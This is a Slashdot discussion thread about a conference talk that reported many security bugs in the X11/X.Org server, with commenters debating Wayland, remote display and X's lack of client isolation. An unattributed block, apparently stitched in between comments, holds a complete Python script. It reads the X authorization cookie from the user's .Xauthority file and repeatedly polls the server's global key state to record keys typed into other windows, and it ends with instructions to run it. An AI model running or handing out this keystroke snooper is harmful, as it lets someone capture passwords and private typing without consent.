X11/X.Org Security In Bad Shape

Soulskill posted about 4 months ago | from the i-blame-the-schools dept.

Security 179

An anonymous reader writes "A presentation at the Chaos Communication Congress explains how X11 Server security with being 'worse than it looks.' The presenter found more than 120 bugs in a few months of security research and is not close to being done with his work. Upstream X.Org developers have begun to call most of his claims valid. The presentation by Ilja van Sprundel is available for streaming."

179 comments

Is X security really a problem? (4, Interesting)

Anonymous Coward | about 4 months ago | (#45833311)

Aren't we going to replace it with Wayland or something really soon?

Re:Is X security really a problem? (0)

Anonymous Coward | about 4 months ago | (#45833359)

explains how X11 Server security with being 'worse than it looks.

What the fuck is this even supposed to mean?

XWayland (4, Informative)

tepples (727027) | about 4 months ago | (#45833391)

Every X11 server needs a rendering target. For some X11 servers, this is a video card. For others, it is a virtual frame buffer that gets served through X11VNC or XRDP. And on machines running Wayland, the X11 server will render to the Wayland compositor [freedesktop.org]. Porting an application's GUI toolkit allows the application to bypass XWayland, but not all applications will be ported to Wayland immediately, especially proprietary software no longer under mainstream support and free software without a large enough user base. But once enough applications get ported, the more complex and less security-hardened parts of X11 will be paged in only while an X11 application is updating its window.

Re:XWayland (1)

Anonymous Coward | about 4 months ago | (#45833579)

So, thanks to a gratuitous API change, legacy systems without "Wayland" can no longer support newer versions of software.

Anyway, fine-grained security is overrated. EVERYTHING sufficiently complex will have at least one nasty hole in it, and one or a hundred come to the same thing. Block whole protocols from the unwashed masses, and know that internally you're at the mercy of any sufficiently determined rogue, so Treat Your Friends Well.

Or engage in an endless arms race. That always works out great.

Re:XWayland (2)

tepples (727027) | about 4 months ago | (#45833743)

So, thanks to a gratuitous API change, legacy systems without "Wayland" can no longer support newer versions of software.

GUI toolkits will likely continue to support both X11 and Wayland backends, just as many currently support X11, Win32, and Quartz backends.

Re:XWayland (1)

jbolden (176878) | about 4 months ago | (#45833883)

First off those kits don't run so well under Quartz or Win32. It is off and on but the support is iffy. I suspect that with X11 the support will be better but the feature set of Wayland fits the mainstream GUIs better. So what I would guess is that the X11 version doesn't get maintained much hence buggy, and is slow.

Re: XWayland (0)

Anonymous Coward | about 3 months ago | (#45834153)

While you may be right in general, Qt works splendidly on Win32.

Re: XWayland (2, Interesting)

Anonymous Coward | about 3 months ago | (#45834467)

To my surprise I raise the following question!

The same people who worked on X Org are working on Wayland now!

These people removed a couple of hundred thousand lines of code from X Org.
They refactored the code.
They cleaned the code.
They think they know what they were doing.

How can we trust them to be successful with Wayland?

Re: XWayland (1)

Anonymous Coward | about 3 months ago | (#45835103)

I'm not a fan of Wayland, but if we assume they are all wonderful, perfect developers, it could be that they inherited the mess that is X, tried to fix it up, and then at some point threw up their hands and said "This shit is just too fucked, we need a full rewrite" - and thus Wayland. I don't think this team is the same group of people that wrote X in the first place.

Re: XWayland (0)

Anonymous Coward | about 3 months ago | (#45835279)

I don't think this team is the same group of people that wrote X in the first place.

Actually, it is, mostly. The people who dislike X the most are the people who have been working on it for the past 25+ years.

Re:XWayland (1)

girlintraining (1395911) | about 4 months ago | (#45833595)

But once enough applications get ported, the more complex and less security-hardened parts of X11 will be paged in only while an X11 application is updating its window.

The flaw in this statement is beyond biblical proportions, and in fact extends into the patently absurd domain of hollywood proportions. Its non-digital counterpart is referenced in #63 of the Evil Overlord List: "Bulk trash will be disposed of in incinerators, not compactors. And they will be kept hot, with none of that nonsense about flames going through accessible tunnels at predictable intervals."

You're suggesting that only having a vulnerability present at certain times mitigates the risk. It does not.

Pushing pixmaps around (2)

tepples (727027) | about 4 months ago | (#45833761)

I intended to emphasize "more complex" rather than "less security-hardened". There's plenty of "more complex" legacy stuff in X11 that almost no modern application uses; most GUI toolkits nowadays just push pixmaps around. The featured article describes the effort to fix the "less security-hardened" part, but the only way to break with "more complex" is to ditch X11 in favor of something that does one thing (push pixmaps around) and does it well. Isn't that what the UNIX philosophy is supposed to be anyway?

Re:Pushing pixmaps around (0, Troll)

girlintraining (1395911) | about 3 months ago | (#45834333)

Isn't that what the UNIX philosophy is supposed to be anyway?

Adherence to a philosophy in the face of more reasonable alternatives is an act of irrationality. Philosophies are meant to guide, not dictate. When a philosophy is elevated to the status of a belief, it ceases being an idea to free us, and instead becomes something to restrict and control us.

The engineer in me says the only "philosophy" one should adopt is the one that leads to the most benefits with the fewest drawbacks. If that requires eschewing the current design paradigm for a different one, then so be it.

Re:Pushing pixmaps around (1)

Anonymous Coward | about 3 months ago | (#45835383)

I am a huge fan of UNIX methodology: do one thing and do it well. It's not just a philosophy, it saves valuable time as a modular design pattern. The problem is defining how big "one thing" can be, as it invariably gets worse as it gets more complex.

Re:Pushing pixmaps around (1)

dbIII (701233) | about 3 months ago | (#45834857)

Yes the brute force approach of pushing pixmaps around which only does it well because ridiculously powerful graphics hardware makes it possible. Meanwhile far less powerful hardware is turning up everywhere and is almost always on a network (eg. congested WiFi) that just does not have the bandwidth to take pixmaps put together by more powerful hardware (and certainly can't do much itself).
This idea of the dumb framebuffer where the application developer has to do a lot of heavy lifting to match the application to display resolution, events etc along with the non-networked approach really does look like a step back into the 1980s to me. The application developers may as well be writing something for a range of video game consoles instead of asking a layer to just put their stuff on the screen and tell it when somebody clicks on it.

RDP and OnLive (2)

tepples (727027) | about 3 months ago | (#45835081)

Meanwhile far less powerful hardware is turning up everywhere and is almost always on a network (eg. congested WiFi) that just does not have the bandwidth to take pixmaps put together by more powerful hardware

Then explain how well RDP has worked usably for me even across the Internet to a PC on what the cable company likes to call "slow DSL from the phone company". Is "congested Wi-Fi" worse than DSL's upstream? And explain how OnLive, Twitch, or any other sort of live streaming video works.

Re:XWayland (1)

Anonymous Coward | about 4 months ago | (#45833605)

Since Wayland is another freedesktop.org project, it will no doubt be integrated into systemd over the next year. What else can be integrated into systemd... how about ssh?

Celestia, of course (0)

Anonymous Coward | about 4 months ago | (#45833829)

Since Wayland is another freedesktop.org project, it will no doubt be integrated into systemd over the next year. What else can be integrated into systemd... how about ssh?

systemd is the best argument yet for legalizing postnatal abortion. I know, let's integrate celestia into systemd!

Re:Celestia, of course (0)

Anonymous Coward | about 3 months ago | (#45835141)

Let's get Eclipse integrated first. Then we can modularize Celestia into an Eclipse plug-in.

Re:XWayland (2)

thegarbz (1787294) | about 3 months ago | (#45833949)

As a matter of interest don't applications just use toolkits like GTK or Qt to render an interface? Can't just the toolkits be ported to Wayland with minimal change to the app?

Are we talking about a re-write to make an app Wayland compatible, or a few minor changes and a recompile?

Re:XWayland (1)

tepples (727027) | about 3 months ago | (#45834077)

We're talking about 1. porting the toolkits and 2. porting the applications to the latest versions of the toolkits. Step 2 can be a few minor changes, recompile, and run through the project's acceptance testing procedure. Or it can be far more involved if any of the following are true:
  • The application currently uses a toolkit that won't be ported to Wayland. Among X11 toolkits [wikipedia.org], Qt and GTK+ will be ported, but many others won't.
  • The application currently uses an old major version of a toolkit. Applications that depend on old GTK+ or old Qt will first have to be ported to a version of the toolkit that supports Wayland.
  • The application is proprietary and no longer under mainstream support.

Re:XWayland (1)

F.Ultra (1673484) | about 3 months ago | (#45834373)

Step 2 can also be "do nothing" since the toolkits can implement support for Wayland without changing the major version of the toolkit so the application can link to the very same .so as it did before. Also the user might run XWayland and then even the old X11-only toolkits will work out of the box.

Re:XWayland (1)

tepples (727027) | about 3 months ago | (#45834461)

the toolkits can implement support for Wayland without changed the major version of the toolkit

This is true provided that a particular major version of a toolkit is still in mainstream support. Consider what happens if, for example, GTK+ 3 gets ported to Wayland but GTK+ 2 does not. In that case, GTK+ 2 applications that aren't ported to GTK+ 3 will need to run in XWayland.

Also the user might run XWayland and then even the old X11-only toolkits will work out of the box.

Previous stories about Wayland have attracted comments to the effect "if most of your apps will be running in XWayland, why even switch to Wayland in the first place?" and I was trying to word my comment to avoid the train of thought that leads there.

Re:XWayland (1)

thegarbz (1787294) | about 3 months ago | (#45835237)

Previous stories about Wayland have attracted comments to the effect "if most of your apps will be running in XWayland, why even switch to Wayland in the first place?" and I was trying to word my comment to avoid the train of thought that leads there.

If people don't realise that a sudden system wide change that breaks all applications is bad without an emulation layer for transition I don't think they can meaningfully participate in any conversation about change.

Ask them how they propose the change to IPv6 if they are so clever.

Re:XWayland (2)

dbIII (701233) | about 3 months ago | (#45834811)

That's right. An upgrade from a complex network aware system with lots of places for bugs to hide to a simple dumb framebuffer where there are less places for bugs to hide. That's fine so long as a simple dumb frame is all you need and so long as it doesn't have lots of places to hide in bits designed to do shiny 3D things thrown together quickly without considering security at all.

Come on now people, let's consider this seriously instead of the silly name calling. Who in Wayland is even thinking about doing it as a secure system yet? I hope that's the way it goes but it's not happening this early in the project. What is it with all these "X sux for a problem that Wayland hasn't even considered yet but will sort out someday" posts?

Re:Is X security really a problem? (2)

fnj (64210) | about 3 months ago | (#45834533)

Aren't we going to replace it with Wayland or something really soon?

What do you mean "we", kemosabe?

Re:Is X security really a problem? (1)

jhol13 (1087781) | about 3 months ago | (#45834893)

Even if we do, what on earth makes you think Wayland is even a bit better?

Re: Is X security really a problem? (0)

Anonymous Coward | about 3 months ago | (#45835089)

It's new! It's hot! It comes from the Gnome crowd! It requires systemd! Gnome depends on systemd! KDE depends soon on systemd! You must have it! It's soo h4wt!

No, Wayland will still take several years (1)

Anonymous Coward | about 3 months ago | (#45835643)

As long as Wayland doesn't support remoting it will not replace anything. Remoting is needed for non-hobbyist heterogeneous environments where you will have to be able to "run" Windows applications on *NIX boxes, and vice versa.

(Most of tailored business applications will never run reliably enough with wine. Also, it is often waste of resources to use fat clients where thin would suffice. Except you can't do thin clients with Wayland...)

Wayland is so far from feature parity that it can be mostly seen as a joke - for corporate environments that is. When it does something like "ssh -X" and "voila, remote application is running", get back to talking about it. Before that stfu.

Hotel 1 Bravo (-1, Offtopic)

rmdingler (1955220) | about 4 months ago | (#45833329)

Did another company draft poorly at the developer position?

Re:Hotel 1 Bravo (2)

DaHat (247651) | about 4 months ago | (#45833491)

Given that X is nearly 30 years old... it sounds more like a number of issues were not considered way back when (trust boundaries for one), and that those same mistakes/assumptions have been carried forward for much of this time.

Re:Hotel 1 Bravo (5, Insightful)

jd (1658) | about 4 months ago | (#45833821)

Some were certainly considered but prohibited by law. Due to crypto export restrictions, it wasn't until the limits on Open Source were loosened that X was legally permitted to have any kind of meaningful security. The non-export version still had to talk to the exportable edition, after all.

Yes, X was (and is) incredibly sloppy by today's standards and yes a lot of that was due to poor decisions in the days of X10. (Yes, boundaries are a decision. MIT could have chosen any sort of access control list system they wanted, with yet another library handling it. You could have then substituted whatever you wanted, so long as the API remained the same. Pretty much futureproof, no significant extra coding, easier to maintain than what they actually did.)

The coding flaws - of which there were many - were often detectable by tools as ancient as lint.

But you must also remember, X10 and X11 were never intended as products. They were reference implementations of a protocol, not finished products intended for actual use. The different vendors were always "supposed" to provide their own.

Re:Hotel 1 Bravo (1)

EvilSS (557649) | about 3 months ago | (#45834927)

Given that X is nearly 30 years old... it sounds more like a number of issues were not considered way back when (trust boundaries for one), and that those same mistakes/assumptions have been carried forward for much of this time.

God I hate that word. If there is one word that I wish I could beat out of every developer, it's "assumption". I know they are necessary to an extent, but man do they come back to bite you in the ass every time...

ANOTHER Phoronix post? (0, Troll)

gcore (748374) | about 4 months ago | (#45833345)

Jesus christ. ANOTHER Phoronix post? Isn't this news for nerds - stuff that MATTERS? Phoronix is a link farm where very few posts matter.

Re:ANOTHER Phoronix post? (1)

Anonymous Coward | about 4 months ago | (#45833369)

You must be new here. Nothing on Slashdot matters, including the people and the comments.

Re:ANOTHER Phoronix post? (0)

epyT-R (613989) | about 3 months ago | (#45834795)

Oh, what are we supposed to care about then? What the masses do? ..and what's that? What's up with the latest dick miley cyrus is fucking?

Re:ANOTHER Phoronix post? (1)

reikae (80981) | about 3 months ago | (#45835525)

You're correct of course, nothing on Earth really matters. We all will die eventually and the whole universe may (will?) be gone one day. Luckily I can mostly forget that and get excited about little things that don't really matter.

Re:ANOTHER Phoronix post? (5, Insightful)

Anaerin (905998) | about 4 months ago | (#45833559)

I'm sorry. You were complaining about a news (Yes, news) story about a talk from CCC (Which is highly popular with, and immensely relevant for, nerds), posted on Phoronix (A website that devotes itself almost entirely to information, news and reviews on hardware and software from a Linux-based perspective), about a lot (120+) of security holes (Things that matter) in the X11/X.org servers (Which are the basis for (almost) all GUI-driven applications in Linux, *BSD and some of OSX).

By my count, that makes this story "News", "For Nerds", and "Stuff that matters". Oh, and the irony in posting that Phoronix is a "Link Farm" on /. is almost entirely palpable.

The process (2)

ebonum (830686) | about 4 months ago | (#45833363)

This is a good thing. This is the way it is supposed to work. This is how things get better. A little late, but it's good to see this happening.

Re:The process (4, Insightful)

dasunt (249686) | about 3 months ago | (#45834435)

This is a good thing. This is the way it is supposed to work. This is how things get better. A little late, but it's good to see this happening.

No. I think it's time to throw X out. We'll make a new implementation, complete with everything I use (we'll plan to add stuff you want later), with all new code, because new code never has any security holes!

Re:The process (1)

jhol13 (1087781) | about 3 months ago | (#45834887)

I do not believe that (things are getting better).
I would be really surprised if the real number of holes is going down significantly, the developers are making holes at the same time as these guys are finding them. Perhaps this temporarily gets the hole count down, but after five years the situation will be the same.

The OSS "mind" has been, for 20 years, "a fixed hole is a good thing". Why on earth would it suddenly change to "do not make new holes"?

And in a related story, water is wet. (0)

Anonymous Coward | about 4 months ago | (#45833459)

X Windows was never designed with security in mind. The fact that it's insecure is no surprise.

When will Wayland contain this essential feature? (3, Funny)

blackpaw (240313) | about 4 months ago | (#45833507)

Cue horde of posts demanding that Wayland must die as it can never replicate the mass security violations that X11 contains.

Re:When will Wayland contain this essential featur (0)

Anonymous Coward | about 4 months ago | (#45833551)

Cue hordes of posts demanding that X11 must die because Wayland does everything better.

Re:When will Wayland contain this essential featur (0)

Anonymous Coward | about 4 months ago | (#45833877)

Cue hordes of posts demanding that X11 must die because Wayland does everything better.

What's the point of X12/Wayland if it didn't?

Re:When will Wayland contain this essential featur (0)

Anonymous Coward | about 3 months ago | (#45833923)

What's the point of X12/Wayland if it didn't?

...exactly!

Re:When will Wayland contain this essential featur (0)

Anonymous Coward | about 3 months ago | (#45834909)

"X12/Wayland"

X12 it's not. Wayland is a total re-write. Outside of compatibility shims it's a different design and not X anything. Just call it Wayland and be done with it.

Just look it up people (1)

dbIII (701233) | about 3 months ago | (#45835009)

Apart from the Xorg hardware drivers it's using to blit its composed framebuffer onto people's screens.
Wayland is a framebuffer compositor designed to replace a few features in X in a new (and incompatible) way in the interests of speed. It still relies on some stuff made for X, and IMHO that's some of the slowest stuff involved in putting things on the screen (eg. gtk), so it will be a bit of a struggle to get an obvious speed benefit unless improvements are made there as well or it gets its own toolkit (which means it will start to resemble the complexity of X).

Re: Just look it up people (0)

Anonymous Coward | about 3 months ago | (#45835107)

DirectFB already supported the ideology of that. I ran a few apps on it a couple of years ago. Sure it has not the same design as Wayland (does it?) but wasn't that a good base to start with rather than starting from scratch?

Re:When will Wayland contain this essential featur (0)

Anonymous Coward | about 3 months ago | (#45835153)

X12? That's an Electronic Data Interchange standard. Nothing to do with the X Window System.

New PSA poster (1)

CajunArson (465943) | about 4 months ago | (#45833517)

When you use an Insecure X11 Stack...
You are displaying windows WITH THE NSA!

Yet another reason why they need to whip Wayland into shape.

Re: New PSA poster (0)

Anonymous Coward | about 3 months ago | (#45835151)

You are missing an 'A' it has to be 'NASA'.

How bad is the overall architecture? (0)

Anonymous Coward | about 4 months ago | (#45833539)

Could it be time for X12?

Re:How bad is the overall architecture? (1)

jones_supa (887896) | about 3 months ago | (#45834243)

Then we would have X12, Wayland and Mir competing...redundant fragmentation over minor differences.

Re:How bad is the overall architecture? (0)

Anonymous Coward | about 3 months ago | (#45834929)

"Could it be time for X12?"

        It was time for X12 fifteen years ago. What did we get then? And what are we getting now?

Re:How bad is the overall architecture? (0)

Anonymous Coward | about 3 months ago | (#45834949)

"Could it be time for X12?"

        Plan9.

Fucking kill it already (1, Insightful)

ArchieBunker (132337) | about 4 months ago | (#45833585)

X had its day in the sun. I want a responsive and fast GUI with network connectivity being somewhere in 10th place. Make that socket/DRI/whatever they cooked up this year into a module so the rest of us don't suffer.

Re:Fucking kill it already (1)

TheGratefulNet (143330) | about 4 months ago | (#45833731)

if it works, why break or reinvent it?

I've been using X for 25 yrs (or close to it) and it does 99% of what I'd want from a transport/gui/toolkit/windowing system.

vnc works great and it's only audio that does not carry over vnc. and I don't care or need that (and there are probably ways around that, too).

we have such fast hardware, I don't get what's wrong with X anymore. even if it's 'slow' in code, it's not slow in practice!

Re:Fucking kill it already (1)

Anonymous Coward | about 4 months ago | (#45833855)

I would have loved to use X11 over the network daily over the decades. Alas, it hasn't worked out. While XTerm has worked great since the 9600-baud terminal connections, the WiFi latencies kill the responsiveness of Firefox, Evince, Emacs, Eclipse and the like. Since XTerm was always fine, I'm left to think the culprit that killed X was the toolkits (together with the synchronous Xlib) that insist on playing ping-pong with the X server. Thank goodness emacs works perfectly on text terminals.

I don't think the Remote Desktop is progress, but something better needs to come along. The X11 protocol is too low-level and the modern themes do too much pixel-level micromanagement. Options include something like a Qt server co-residing with Wayland with a thin Qt API library linked with the remote client application or a Turing-complete applet sandbox (a la Javascript) where the remote application's GUI library downloads the toolkit to the local Wayland server and does ad hoc communication with the remote client.

Re:Fucking kill it already (1)

epyT-R (613989) | about 3 months ago | (#45834853)

That is a horrible idea.. the last thing we need to do is waste even more performance with useless sandboxing and other jive. There's too much of that going on everywhere else now. Regardless of protocol, having sane toolkits and themes in the first place would go a long way towards making remote desktop quick and responsive even with bad connectivity. This means no stupid pixel shader driven desktops when running in remote mode..

Re:Fucking kill it already (1)

dbIII (701233) | about 3 months ago | (#45835029)

I'm left to think the culprit that killed X was the toolkits

And the idea is for them to still live on in Wayland.
I still don't see anything in Wayland that things like "evas" can't already give us on X (yes I know that "evas" for Wayland is also in progress).

Re:Fucking kill it already (0)

Anonymous Coward | about 3 months ago | (#45833921)

I know this is Slashdot but come on, half the comments are talking about it. RTFS and notice that there's a SECURITY problem! It's NOT working!

Re:Fucking kill it already (2)

smash (1351) | about 3 months ago | (#45835291)

Because it only works for very generous definitions of "works". If you've never used anything else maybe remote X seems like it rocks, but vs. ICA or RDP (even the versions from 1999) its performance is abysmal.

Re:Fucking kill it already (1)

Anonymous Coward | about 4 months ago | (#45833779)

X had its day in the sun. I want a responsive and fast GUI with network connectivity being somewhere in 10th place. Make that socket/DRI/whatever they cooked up this year into a module so the rest of us don't suffer.

X is plenty fast on its own.

Direct your rant at the Gnome/KDE window-dressing/eye-candy fetishists.

Don't blame the Titanic for the captain running it into the iceberg.

Re:Fucking kill it already (1)

fikx (704101) | about 3 months ago | (#45833907)

You mean the "rest of us" being that minority that doesn't use and/or doesn't understand X11 network functionality?

Re:Fucking kill it already (1)

drinkypoo (153816) | about 3 months ago | (#45833981)

You mean the "rest of us" being that minority that doesn't use and/or doesn't understand X11 network functionality?

Minority? The majority of X11 users will never remote an application.

Re:Fucking kill it already (1)

fikx (704101) | about 3 months ago | (#45834777)

if I count most comments about it, you're outnumbered, hence "minority"

Re:Fucking kill it already (1)

dbIII (701233) | about 3 months ago | (#45834899)

Since that minority is huge and includes just about every linux desktop used for work purposes and a pile of MS Windows machines with X to run remote stuff as well I consider it a minority worth listening to.
Ignorance is not a virtue.

Re:Fucking kill it already (1)

epyT-R (613989) | about 3 months ago | (#45834965)

The majority of users never create content either, so should we just get rid of desktops entirely and force developers to use tablets?

Re:Fucking kill it already (2)

smash (1351) | about 3 months ago | (#45835303)

... and remote X sucks balls really bad anyway. It's passable on gigabit ethernet, anything slower than that and it is pretty horrible. Meanwhile, even RDP is usable over 64 kilobit.

Re:Fucking kill it already (1)

Desler (1608317) | about 3 months ago | (#45834737)

You think the majority of users use network transparency? LOL. Most apps can't even support it if the user wanted it.

Re:Fucking kill it already (3, Informative)

fikx (704101) | about 3 months ago | (#45834783)

All X11 apps "support" it...that's the beauty of X11 network functionality: apps don't HAVE to support it, it comes free.

Re:Fucking kill it already (1)

epyT-R (613989) | about 3 months ago | (#45834839)

It does have a responsive and fast response.. It's the bloated toolkits and useless eyecandy rendering engines sitting under it that are the problem.. Turn off the compositor and it responds just fine, even on ancient late 90s hardware.

Slashdot editing in bad shape (1)

wonkey_monkey (2592601) | about 4 months ago | (#45833619)

A presentation at the Chaos Communication Congress explains how X11 Server security with being 'worse than it looks.'

Still, at least you didn't just copy and paste, so points for that.

Broken by design (3, Informative)

Misagon (1135) | about 4 months ago | (#45833635)

It is not as if the way X works is particularly secure to begin with. Once an app has a connection to the X server, it has full control over the world of windows, pixmaps and events on the server, including of course all other apps.

Not that I have any faith in Wayland or Mir being any better, its developers coming from the X world in the first place, I am sure that they will make their new shiny systems vulnerable in the same ways.

Re:Broken by design (4, Insightful)

phantomfive (622387) | about 3 months ago | (#45833987)

Doesn't everyone use X over an ssh tunnel anyway? I haven't used a raw X connection in over a decade.....

Re:Broken by design (4, Insightful)

Rich0 (548339) | about 3 months ago | (#45834225)

Doesn't everyone use X over an ssh tunnel anyway? I haven't used a raw X connection in over a decade.....

That doesn't help at all. He's talking about the fact that any X client can obtain information from any other X client on the same server. Tunneling the X clients through ssh doesn't help at all - it just causes the server to make all that information available over ssh.

Granted, the last time I checked linux makes the memory space of every process for any uid available to any other process running under the same uid (unless you're using SELinux). It is just that big unixy trust-everything-local attitude.

Why is this sort of thing bad? Well, now not only can a browser exploit result in a script being able to sniff your keyboard traffic to other tabs in the same browser, it can also sniff your keyboard traffic to every other window on your display, regardless of where those clients are actually running. There are ways to block it, but nobody uses them as they are rather inconvenient (xterm probably still supports it though).

However, until we close the gap of my web browser being able to read my mail directory or modify my .bashrc, I think that X11 vulnerabilities are just the tip of the iceberg.
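The point Misagon and Rich0 make above (a connected client gets the whole display, and any X client can watch keyboard state meant for other windows) is easy to verify. The following is an added example written for this page, not code from the thread, from X.Org or from the 30C3 talk. It does two things with nothing but the standard library: it parses the .Xauthority file, which any process running as the same uid can read, and it uses the MIT-MAGIC-COOKIE-1 it finds there to open a raw connection and poll QueryKeymap, the core-protocol request that returns the current key-down bitmap regardless of which client has focus. Assumptions: a local server reachable at /tmp/.X11-unix/X<n> (a forwarded DISPLAY such as localhost:10 uses TCP and is not handled), the cookie file at $XAUTHORITY or ~/.Xauthority, and the sample .Xauthority blob and sample reply are constructed here for the offline part. Two caveats worth knowing: a plain local cookie like this one is fully trusted, and the per-connection trust level (xauth generate ... untrusted, which OpenSSH's -X forwarding uses when ForwardX11Trusted is off) is the closest thing X has to the isolation the thread is asking for; and under XWayland the X server only receives the input the compositor routes to X11 windows, so the same poll sees nothing typed into native Wayland clients.

```python
"""Added example: raw X11 client that reads the shared cookie and polls the
global key-down bitmap (QueryKeymap). Not from the thread or from X.Org."""
import os
import socket
import struct
import time

FAMILY_LOCAL = 256                 # .Xauthority family code for local displays
MIT_COOKIE = "MIT-MAGIC-COOKIE-1"

# Constructed sample .Xauthority (one entry, fake cookie): each field is a
# big-endian 16-bit length followed by its bytes.
SAMPLE_COOKIE = bytes(range(16))
SAMPLE_XAUTHORITY = (
    struct.pack(">H", FAMILY_LOCAL)
    + struct.pack(">H", 4) + b"host"
    + struct.pack(">H", 1) + b"0"
    + struct.pack(">H", len(MIT_COOKIE)) + MIT_COOKIE.encode()
    + struct.pack(">H", 16) + SAMPLE_COOKIE
)
# Constructed QueryKeymap reply: 8-byte header, then 256 key bits with
# keycodes 0 and 255 down.
SAMPLE_REPLY = b"\x01\x00\x05\x00\x02\x00\x00\x00" + bytes([0x01] + [0] * 30 + [0x80])


def parse_xauthority(data: bytes) -> list:
    """Return (family, address, display, auth_name, cookie) per entry."""
    entries, off = [], 0
    while off < len(data):
        family = struct.unpack_from(">H", data, off)[0]
        off += 2
        fields = []
        for _ in range(4):                       # address, number, name, data
            n = struct.unpack_from(">H", data, off)[0]
            off += 2
            fields.append(data[off:off + n])
            off += n
        addr, num, name, cookie = fields
        entries.append((family, addr, num.decode(), name.decode(), cookie))
    return entries


def find_cookie(entries: list, display: str):
    """The cookie any same-uid process can read and present to the server."""
    for family, _addr, num, name, cookie in entries:
        if family == FAMILY_LOCAL and num == display and name == MIT_COOKIE:
            return name, cookie
    return None


def _pad4(n: int) -> int:
    return (4 - n % 4) % 4


def build_setup_request(auth_name: bytes, auth_data: bytes) -> bytes:
    """Connection setup: 'l' byte order, protocol 11.0, name+data 4-byte padded."""
    head = struct.pack("<BxHHHHxx", ord("l"), 11, 0, len(auth_name), len(auth_data))
    return (head + auth_name + b"\0" * _pad4(len(auth_name))
            + auth_data + b"\0" * _pad4(len(auth_data)))


def build_query_keymap_request() -> bytes:
    """QueryKeymap: opcode 44, unused byte, request length 1 (4-byte units)."""
    return struct.pack("<BxH", 44, 1)


def pressed_keycodes(reply: bytes) -> list:
    """Decode the 40-byte reply: header, then 32 bytes = one bit per keycode."""
    if len(reply) != 40 or reply[0] != 1:
        raise ValueError("not a QueryKeymap reply")
    bits = reply[8:]
    return [k for k in range(256) if (bits[k // 8] >> (k % 8)) & 1]


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection")
        buf += chunk
    return buf


def snoop(seconds: float = 3.0) -> None:
    """Live part (assumes a local Unix-socket display): print keycodes that are
    down, whichever client owns the focus."""
    display = os.environ.get("DISPLAY", ":0").split(":")[1].split(".")[0]
    path = os.environ.get("XAUTHORITY") or os.path.expanduser("~/.Xauthority")
    with open(path, "rb") as f:
        auth = find_cookie(parse_xauthority(f.read()), display)
    if auth is None:
        raise SystemExit("no MIT-MAGIC-COOKIE-1 entry for display :" + display)
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
        s.connect("/tmp/.X11-unix/X" + display)
        s.sendall(build_setup_request(auth[0].encode(), auth[1]))
        head = _recv_exact(s, 8)              # status, then lengths
        if head[0] != 1:
            raise SystemExit("setup refused by server (status %d)" % head[0])
        _recv_exact(s, struct.unpack_from("<H", head, 6)[0] * 4)  # skip setup data
        end = time.time() + seconds
        while time.time() < end:
            s.sendall(build_query_keymap_request())
            down = pressed_keycodes(_recv_exact(s, 40))
            if down:
                print("keycodes down:", down)
            time.sleep(0.1)


if __name__ == "__main__":
    print(parse_xauthority(SAMPLE_XAUTHORITY))
    print(pressed_keycodes(SAMPLE_REPLY))   # [0, 255]
    if os.environ.get("DISPLAY"):
        snoop()
```

Run it on a desktop with DISPLAY set and type into any other window for a few seconds: the keycodes show up even though this client owns no window and selected no events. Nothing in the exchange identifies the requesting client as less trustworthy than the window with focus, which is the design property the posts above describe.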

Re:Broken by design (1)

F.Ultra (1673484) | about 3 months ago | (#45834411)

Granted, the last time I checked linux makes the memory space of every process for any uid available to any other process running under the same uid (unless you're using SELinux). It is just that big unixy trust-everything-local attitude.

Which mainstream OS does this differently? AFAIK this is the way it works in Windows and OSX as well, unsure about the BSDs though but I wouldn't be surprised if they also do it like this (it would be a pain to use things like strace or shared memory otherwise and the MMU tables would be quite big)

Re:Broken by design (1)

Rich0 (548339) | about 3 months ago | (#45834503)

Granted, the last time I checked linux makes the memory space of every process for any uid available to any other process running under the same uid (unless you're using SELinux). It is just that big unixy trust-everything-local attitude.

Which mainstream OS does this differently?

Linux under SELinux potentially does this differently. I guess you could also count Android - as it gives each application a separate uid, though access to the sdcard is all-or-nothing.

However, yes, this is a common vulnerability, and just another reason why the world is crawling with worms.

Re:Broken by design (0)

Anonymous Coward | about 3 months ago | (#45834761)

And who isn't running SELinux yet? I remember working with it about 10 years ago. Now it's so good, I just sit back and watch this [youtube.com] all day.

Re:Broken by design (1)

bill_mcgonigle (4333) | about 3 months ago | (#45834579)

Which mainstream OS does this differently?

When I was reading up about this a few months ago, it was noted that Windows Vista fixed this on the Windows line. So, yeah, even Windows 8 does something better than a GNU/Linux desktop.

The SELinux fix has been roughed out, but it's not very usable and certainly not mainstream.

I was really disappointed to read that Wayland would possibly bolt this on later, but had nothing baked into the core protocol.

Re:Broken by design (1)

MikeBabcock (65886) | about 3 months ago | (#45835443)

Actually, Android comes to mind. Each application is locked in its own little world (except apps from the same developer) and can only talk to other apps via API calls they've previously agreed on or published.

It's actually quite a nice model.

Re:Broken by design (1)

10101001 10101001 (732688) | about 3 months ago | (#45834591)

Granted, the last time I checked linux makes the memory space of every process for any uid available to any other process running under the same uid (unless you're using SELinux). It is just that big unixy trust-everything-local attitude.

Actually, what makes it worse than that is that (1) there are suid X clients which makes for an obvious privilege escalation attack vector through the X server and (2) the X server itself is root which makes the X server a big target. The fact that the presentation spoke repeatedly about how nasty GLX was is only funny to me in a dark way because of just how insecure GPUs seem anyway as they suffer even worse from the "unixy" trust-everything-local attitude. So, while I'd love to hear that he succeeds in his GLX clean ups, I only think that clears one bug hurdle while still leaving (a) OpenGL drivers and (b) potentially hardware GPU memory protection limitations. Screen scraping at the kernel level seems worse if nothing else because it doesn't require nearly the level of sophistication in actually discovering which window holds what object and then try to grab or trap for passwords or whatever that way.

However, until we close the gap of my web browser being able to read my mail directory or modify my .bashrc, I think that X11 vulnerabilities are just the tip of the iceberg.

Strictly speaking, we already have that capability in SELinux or in AppArmor. The reason it's not really heavily implemented is because you might want your web browser to be able to save a file in your mail directory or overwrite your local .bashrc from a server stored copy somewhere. Meanwhile, sticking all the UI stuff to allow/disallow isn't some magic bullet--Windows NT has a very robust system of protection that does very little because people don't micromanage things. And honestly, the issue isn't that the web browser has access to your mail directory. It's that a nefarious web site may manipulate your web browser to read the mail directory when you don't want it to. If that's really a big enough concern, you can just run the web browser as a different user....so long as the X11 bugs are fixed. :)

Re:Broken by design (2)

Rich0 (548339) | about 3 months ago | (#45834759)

the X server itself is root which makes the X server a big target

Good point. With KMS I'm not quite sure why it still is root, but sure enough mine is...

